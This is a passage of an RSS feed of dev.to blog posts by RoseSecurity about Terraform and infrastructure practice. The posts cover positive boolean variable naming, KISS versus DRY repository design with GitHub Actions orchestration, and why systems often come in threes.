  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_s3_bucket_server_side_encryption_configuration"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;disable_encryption&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
  &lt;span class="nx"&gt;bucket&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_s3_bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;count&lt;/code&gt; line requires mental translation: "If &lt;code&gt;disable_encryption&lt;/code&gt; is &lt;code&gt;false&lt;/code&gt;, then &lt;code&gt;count&lt;/code&gt; is &lt;code&gt;1&lt;/code&gt;, so encryption is enabled." That's a double negative in what should be straightforward logic.&lt;/p&gt;

&lt;p&gt;This pattern creates real problems during code review. A change from &lt;code&gt;default = false&lt;/code&gt; to &lt;code&gt;default = true&lt;/code&gt; looks like it's "enabling" something when it's actually doing the opposite.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ✅ Positive variable name&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"encryption_enabled"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Enable encryption"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_s3_bucket_server_side_encryption_configuration"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encryption_enabled&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
  &lt;span class="nx"&gt;bucket&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_s3_bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The logic now reads directly: "If &lt;code&gt;encryption_enabled&lt;/code&gt; is &lt;code&gt;true&lt;/code&gt;, create the encryption config."&lt;/p&gt;

&lt;p&gt;Positive naming also makes security choices more explicit. Setting &lt;code&gt;encryption_enabled = false&lt;/code&gt; is visually clearer than &lt;code&gt;disable_encryption = true&lt;/code&gt;, even though they're functionally equivalent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Name variables for what they enable, not what they prevent.&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>iac</category>
      <category>infrastructure</category>
      <category>devops</category>
    </item>
    <item>
      <title>KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Wed, 19 Nov 2025 15:34:02 +0000</pubDate>
      <link>https://dev.to/rosesecurity/kiss-vs-dry-in-infrastructure-as-code-why-simple-often-beats-clever-foh</link>
      <guid>https://dev.to/rosesecurity/kiss-vs-dry-in-infrastructure-as-code-why-simple-often-beats-clever-foh</guid>
      <description>&lt;h2&gt;
  
  
  The Scale Gap Problem
&lt;/h2&gt;

&lt;p&gt;Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.&lt;/p&gt;

&lt;p&gt;Then you get to your actual production environment, and everything changes.&lt;/p&gt;

&lt;p&gt;You're not starting from scratch with a blank AWS account. You've got existing resources that were manually created two years ago by someone who left the company. There's brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what's actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.&lt;/p&gt;

&lt;p&gt;Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You're not just writing infrastructure code anymore. You're trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.&lt;/p&gt;

&lt;p&gt;This is the scale gap, and it's where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.&lt;/p&gt;

&lt;h2&gt;
  
  
  The DRY Revolution: Solving Yesterday's Problems
&lt;/h2&gt;

&lt;p&gt;When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don't Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.&lt;/p&gt;

&lt;p&gt;Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented "best practices," not necessarily because they had the specific problems these tools were designed to solve.&lt;/p&gt;

&lt;p&gt;The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.&lt;/p&gt;

&lt;p&gt;Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, for_each, improved module capabilities, and other features designed to support DRY principles natively.&lt;/p&gt;

&lt;p&gt;On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hidden Costs of Going DRY
&lt;/h2&gt;

&lt;h3&gt;
  
  
  When Abstractions Break, Troubleshooting Becomes Archaeological
&lt;/h3&gt;

&lt;p&gt;It's 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.&lt;/p&gt;

&lt;p&gt;With a DRY setup using Terragrunt and hierarchical inheritance, you're not just reading Terraform code. You're tracing values through multiple layers: the root &lt;code&gt;terragrunt.hcl&lt;/code&gt; with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.&lt;/p&gt;

&lt;p&gt;Where did that database configuration value actually come from? The global config? The environment override? A module default? You're playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.&lt;/p&gt;

&lt;p&gt;The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Onboarding Cliff
&lt;/h3&gt;

&lt;p&gt;It's a new team member's first day and they need to update a security group rule in the staging environment. Simple enough, right?&lt;/p&gt;

&lt;p&gt;With DRY abstraction tooling, they need to learn Terraform itself, your module library's conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.&lt;/p&gt;

&lt;p&gt;That's not onboarding, that's an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.&lt;/p&gt;

&lt;p&gt;Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.&lt;/p&gt;

&lt;h3&gt;
  
  
  Ecosystem Lock-in: The Hidden Technical Debt
&lt;/h3&gt;

&lt;p&gt;Once you've invested in a DRY abstraction framework, you're locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.&lt;/p&gt;

&lt;p&gt;Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool's limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.&lt;/p&gt;

&lt;p&gt;You've traded lines of code for organizational flexibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  The KISS Alternative: Orchestration in Pipelines, Simplicity in Code
&lt;/h2&gt;

&lt;p&gt;After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: &lt;strong&gt;pure Terraform with GitHub Actions orchestration&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;This isn't about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there's a simpler path that works better.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Core Insight: Complexity Can Only Be Relocated
&lt;/h3&gt;

&lt;p&gt;Orchestration complexity across environments cannot be eliminated. You can't wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.&lt;/p&gt;

&lt;p&gt;The question isn't "how do we eliminate complexity?" It's "where do we put the complexity to minimize time to business value?"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DRY approach&lt;/strong&gt;: Complexity lives in abstraction tooling and configuration hierarchies&lt;br&gt;
&lt;strong&gt;KISS approach&lt;/strong&gt;: Complexity lives in CI/CD pipelines, where it's observable and debuggable&lt;/p&gt;

&lt;h3&gt;
  
  
  The Repo Structure: Nested and Navigable
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key characteristics:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Can break down by service (eks, mwaa, opensearch) or by logical grouping depending on your needs&lt;/li&gt;
&lt;li&gt;Each service has its own state file, isolated blast radius&lt;/li&gt;
&lt;li&gt;Reusable modules in central directory&lt;/li&gt;
&lt;li&gt;No terraliths, no monolithic state files&lt;/li&gt;
&lt;li&gt;Completely navigable, you can grep for anything&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each service directory is a complete Terraform root module. Open &lt;code&gt;aws/us-east-1/prod/eks/&lt;/code&gt; and you see exactly what's deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.&lt;/p&gt;

&lt;h3&gt;
  
  
  Yes, Backend Configs Repeat (And That's Actually a Feature)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# aws/core-infrastructure/prod/backend.tf&lt;/span&gt;
&lt;span class="nx"&gt;terraform&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;backend&lt;/span&gt; &lt;span class="s2"&gt;"s3"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;bucket&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"myorg-terraform-state-prod"&lt;/span&gt;
    &lt;span class="nx"&gt;key&lt;/span&gt;            &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"core-infrastructure/terraform.tfstate"&lt;/span&gt;
    &lt;span class="nx"&gt;region&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"us-east-1"&lt;/span&gt;
    &lt;span class="nx"&gt;encrypt&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="nx"&gt;dynamodb_table&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"terraform-state-lock-prod"&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.&lt;/p&gt;

&lt;p&gt;When something goes wrong with state, I can immediately see which bucket holds this state, which DynamoDB table provides locking, and I don't need to trace through dynamic generation logic. Running &lt;code&gt;grep "myorg-terraform-state-prod"&lt;/code&gt; shows me every environment using that bucket instantly.&lt;/p&gt;

&lt;p&gt;The cost of repetition is about 100 lines of simple YAML across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.&lt;/p&gt;

&lt;h3&gt;
  
  
  Orchestration Lives in Pipelines
&lt;/h3&gt;

&lt;p&gt;This is where the magic happens, and where the orchestration complexity actually belongs.&lt;/p&gt;

&lt;p&gt;Home-grown GitHub Actions provide:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For Pull Requests:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auto-detect which environments changed based on file paths&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;terraform plan&lt;/code&gt; for affected environments&lt;/li&gt;
&lt;li&gt;Post plan output as PR comment&lt;/li&gt;
&lt;li&gt;Run security/compliance checks&lt;/li&gt;
&lt;li&gt;Block merge on plan failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;For Main Branch:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auto-detect environments to apply&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;terraform apply&lt;/code&gt; with approval gates&lt;/li&gt;
&lt;li&gt;Alert on failed applies&lt;/li&gt;
&lt;li&gt;Remediate orphaned resources&lt;/li&gt;
&lt;li&gt;Track drift and create tickets&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Scheduled:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Nightly drift detection across all environments&lt;/li&gt;
&lt;li&gt;Compare live state to code&lt;/li&gt;
&lt;li&gt;Alert on unexpected changes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that's invisible (which is exactly as it should be).&lt;/p&gt;

&lt;h2&gt;
  
  
  Addressing the Objections
&lt;/h2&gt;

&lt;h3&gt;
  
  
  "But You're Repeating Backend Configurations!"
&lt;/h3&gt;

&lt;p&gt;Yes. Intentionally.&lt;/p&gt;

&lt;p&gt;100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt's nuances. Which has a better ROI?&lt;/p&gt;

&lt;p&gt;Repetition creates greppability. When investigating state issues, &lt;code&gt;grep "bucket-name"&lt;/code&gt; immediately shows every environment. No tracing through dynamic generation. No "where did this value come from?"&lt;/p&gt;

&lt;p&gt;In infrastructure code, transparency trumps terseness every time.&lt;/p&gt;

&lt;h3&gt;
  
  
  "You Don't Have Hierarchical Inheritance!"
&lt;/h3&gt;

&lt;p&gt;Correct, and that's also intentional.&lt;/p&gt;

&lt;p&gt;Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you're debugging the inheritance chain instead of the infrastructure.&lt;/p&gt;

&lt;p&gt;Without inheritance, every value is explicit in the environment directory. New team members don't need to learn your inheritance model, they just read the config.&lt;/p&gt;

&lt;p&gt;The onboarding time saved pays for repeated config 100 times over.&lt;/p&gt;

&lt;h3&gt;
  
  
  "This Won't Scale!"
&lt;/h3&gt;

&lt;p&gt;It depends on what you mean by "scale."&lt;/p&gt;

&lt;p&gt;200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.&lt;/p&gt;

&lt;p&gt;The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?&lt;/p&gt;

&lt;p&gt;Most teams adopt DRY tooling as "best practice" before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use What: The Nuanced Reality
&lt;/h2&gt;

&lt;h3&gt;
  
  
  KISS Makes Sense When:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You have fewer than 500 environments&lt;/li&gt;
&lt;li&gt;Team size is small to medium (&amp;lt; 50 engineers)&lt;/li&gt;
&lt;li&gt;Change frequency is low (infrastructure mostly stable after initial deployment)&lt;/li&gt;
&lt;li&gt;Operational clarity is critical (regulated industries, high-stakes infrastructure)&lt;/li&gt;
&lt;li&gt;Team has varied experience levels (sysadmins, not primarily developers)&lt;/li&gt;
&lt;li&gt;Troubleshooting speed matters more than code elegance&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  DRY Tooling Makes Sense When:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You genuinely have massive scale (1000+ environments with interdependencies)&lt;/li&gt;
&lt;li&gt;Your team is primarily platform engineers comfortable with abstraction&lt;/li&gt;
&lt;li&gt;You have dedicated platform team maintaining the tooling&lt;/li&gt;
&lt;li&gt;Environment configurations have complex shared logic that changes frequently&lt;/li&gt;
&lt;li&gt;You're building infrastructure-as-a-product with many consumers&lt;/li&gt;
&lt;li&gt;Compliance requires enforced patterns across all deployments&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Real Question: What's Your Actual Cost Metric?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;If your cost metric is lines of code written&lt;/strong&gt;, choose DRY.&lt;br&gt;
&lt;strong&gt;If your cost metric is time to accomplish business goals&lt;/strong&gt;, choose KISS.&lt;/p&gt;

&lt;p&gt;Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how "clean" the code looks.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Anti-Pattern: Engineering for Engineering's Sake
&lt;/h2&gt;

&lt;p&gt;The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.&lt;/p&gt;

&lt;p&gt;When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they're often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.&lt;/p&gt;

&lt;p&gt;Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn't require specialized knowledge to make basic changes. It doesn't become a bottleneck or a point of pride, it's just there, working, quietly enabling the business.&lt;/p&gt;

&lt;p&gt;This requires humility. The "clever" solution that demonstrates engineering prowess is often the wrong solution for the business. The "boring" solution that anyone can understand and modify is often right.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Minimum Viable Architecture Principle
&lt;/h2&gt;

&lt;p&gt;Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.&lt;/p&gt;

&lt;p&gt;Don't build for imagined future scale that may never materialize. Don't adopt sophisticated tooling because it's "best practice" if you don't have the problems it solves. Don't engineer abstractions that save lines of code but cost weeks of onboarding time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Infrastructure is an auxiliary operation.&lt;/strong&gt; Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion: Choose Boring Technology
&lt;/h2&gt;

&lt;p&gt;After years of working with Infrastructure as Code at various scales, here's what I've learned:&lt;/p&gt;

&lt;p&gt;Orchestration complexity can't be eliminated, it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.&lt;/p&gt;

&lt;p&gt;Terraform itself is powerful enough for most use cases. Most teams don't need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.&lt;/p&gt;

&lt;p&gt;There's a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren't there yet. They're paying complexity costs for benefits they haven't yet earned.&lt;/p&gt;

&lt;p&gt;Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.&lt;/p&gt;




&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>culture</category>
      <category>technicaldebt</category>
      <category>codequality</category>
    </item>
    <item>
      <title>Gang of Three: Pragmatic Operations Design Patterns</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Fri, 24 Oct 2025 16:54:20 +0000</pubDate>
      <link>https://dev.to/rosesecurity/gang-of-three-pragmatic-operations-design-patterns-a40</link>
      <guid>https://dev.to/rosesecurity/gang-of-three-pragmatic-operations-design-patterns-a40</guid>
      <description>&lt;p&gt;This blog is dedicated to &lt;a href="https://github.com/arcaven" rel="noopener noreferrer"&gt;arcaven&lt;/a&gt;, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.&lt;/p&gt;

&lt;h2&gt;
  
  
  I Can't Unsee It
&lt;/h2&gt;

&lt;p&gt;A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?&lt;/p&gt;

&lt;p&gt;The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you'll find the rule of three embedded in nearly every mature infrastructure decision.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where Consensus Algorithms Meet Change Management
&lt;/h2&gt;

&lt;p&gt;Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.&lt;/p&gt;

&lt;p&gt;Two nodes cannot lose anything without risking deadlock or split-brain scenarios. Four or five nodes provide more headroom for failures, but three is the minimum viable number that actually delivers reliable consensus. It is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation, this is mathematics driving architecture.&lt;/p&gt;

&lt;p&gt;The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3am. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.&lt;/p&gt;

&lt;p&gt;This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.&lt;/p&gt;

&lt;h2&gt;
  
  
  AWS Best Practices and Chaos Engineering
&lt;/h2&gt;

&lt;p&gt;AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.&lt;/p&gt;

&lt;p&gt;Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.&lt;/p&gt;

&lt;p&gt;Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Storage Hierarchies and Performance Tiers
&lt;/h2&gt;

&lt;p&gt;Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.&lt;/p&gt;

&lt;p&gt;Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.&lt;/p&gt;

&lt;p&gt;Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Practical Value of Three
&lt;/h2&gt;

&lt;p&gt;Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.&lt;/p&gt;

&lt;p&gt;This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value. Thanks for reading, and if you like this blog, you might like the code and tools in &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my Github&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>infrastructureascode</category>
      <category>systemdesign</category>
      <category>distributedsystems</category>
      <category>architecture</category>
    </item>
    <item>
      <title>I love writing useless tools... but I also believe that infrastructure-as-code deserves some more spice and flair, so I created Neofetch for Terraform! https://github.com/RoseSecurity/terrafetch</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Wed, 28 May 2025 12:30:10 +0000</pubDate>
      <link>https://dev.to/rosesecurity/i-love-writing-useless-tools-but-i-also-believe-that-infrastructure-as-code-deserves-some-more-19m7</link>
      <guid>https://dev.to/rosesecurity/i-love-writing-useless-tools-but-i-also-believe-that-infrastructure-as-code-deserves-some-more-19m7</guid>
      <description></description>
      <category>terraform</category>
      <category>devops</category>
      <category>opensource</category>
      <category>tooling</category>
    </item>
    <item>
      <title>The Abstraction Debt in Infrastructure as Code</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Fri, 11 Apr 2025 12:10:12 +0000</pubDate>
      <link>https://dev.to/rosesecurity/the-abstraction-debt-in-infrastructure-as-code-g6g</link>
      <guid>https://dev.to/rosesecurity/the-abstraction-debt-in-infrastructure-as-code-g6g</guid>
